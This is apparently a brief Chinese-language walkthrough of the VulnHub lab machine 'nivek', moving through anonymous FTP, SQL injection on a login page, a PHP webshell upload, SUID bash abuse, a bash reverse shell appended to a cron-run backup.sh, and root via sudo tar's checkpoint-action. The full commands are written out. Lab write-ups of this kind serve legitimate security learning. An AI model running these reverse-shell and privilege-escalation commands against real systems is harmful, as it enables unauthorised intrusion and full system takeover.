vulnhub-nivek
工具
nmap
burpsuite
学习知识
计划任务文件
/etc/crontab
tar提权漏洞
sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo使用
sudo -l 显示出自己(执行 sudo 的使用者)的权限
步骤
扫IP
扫端口
查看ftp服务
发现可以匿名登陆,但不能操作文件。
ftp 192.168.47.145
Name:anonymous
无密码
查看7080服务
是个登陆界面,尝试登录抓包,在email处发现sql
成功登录
源代码中找php文件
访问setting.php
发现文件上传点
上传php webshell
发现可以直接上传
寻找文件上传位置
访问此文件
并用kali连接
成功获得web shell
使用python提升为命令行
python -c "import pty;pty.spawn('/bin/bash')"
查找suid文件
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
说明执行/usr/bin/bash就会临时有eren的权限
/usr/bin/bash -p
使用eren用户,查看文件,含有文件backup.sh,查看
查看靶机计划任务文件
cat /etc/crontab
发现/home/eren/backup.sh文件每五分钟会自动运行一次
尝试将反向shell写入/home/eren/backup.sh,等待连接
echo "bash -i >& /dev/tcp/192.168.47.141/6666 0>&1" >> /home/eren/backup.sh
kali监听6666端口,等待一会,会自动连接
连接成功
查看此时权限
sudo -l
发现可以使用root的/bin/tar
尝试tar提权漏洞
sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
在root目录下找到root.txt
成功